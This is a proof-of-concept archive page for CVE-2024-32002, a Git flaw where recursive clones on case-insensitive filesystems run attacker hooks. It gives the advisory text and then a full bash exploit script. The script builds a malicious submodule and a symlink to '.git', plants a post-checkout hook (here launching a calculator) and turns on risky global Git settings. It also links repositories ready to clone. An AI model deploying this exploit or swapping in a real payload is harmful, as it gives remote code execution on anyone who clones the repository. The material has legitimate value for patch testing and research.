Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2024-32002 PoC — Git's recursive clones on case-insensitive filesystems that support symlinks are susceptible to Remote Code Execution

Source
https://github.com/XiaomingX/CVE-2024-32002-poc
Associated Vulnerability
Title:Git's recursive clones on case-insensitive filesystems that support symlinks are susceptible to Remote Code Execution (CVE-2024-32002)
Description:Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources.
Description
CVE-2024-32002 是 Git 中的一个严重漏洞,允许攻击者在用户执行 git clone 操作时远程执行任意代码(RCE)。
Readme
# CVE-2024-32002-EXP

```
#!/bin/bash

# 设置 Git 配置选项
git config --global protocol.file.allow always
git config --global core.symlinks true
# 避免警告消息(设置默认分叉为main)
git config --global init.defaultBranch main 

# 定义 tell-tale 路径
tell_tale_path="$PWD/tell.tale"

# 初始化 hook 仓库
git init hook
cd hook
mkdir -p y/hooks

# 将恶意代码写入 hook,适配windows环境与mac环境
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
calc.exe
open -a Calculator.app
EOF

# 使 hook 可执行:重要
chmod +x y/hooks/post-checkout

git add y/hooks/post-checkout
git commit -m "post-checkout"

cd ..

# 定义 hook 仓库路径
hook_repo_path="$(pwd)/hook"

# 初始化 captain 仓库
git init captain
cd captain
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m "add-submodule"

# 创建符号链接
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
cd ..

# 本地测试,传到github无需使用此功能
git clone --recursive captain hooked
```

https://github.com/10cks/captain

https://github.com/10cks/hook
File Snapshot

 [4.0K]  /data/pocs/7410ee71b351ee64f6b015435eea11caf530859f
├── [ 11K]  LICENSE
└── [1.2K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →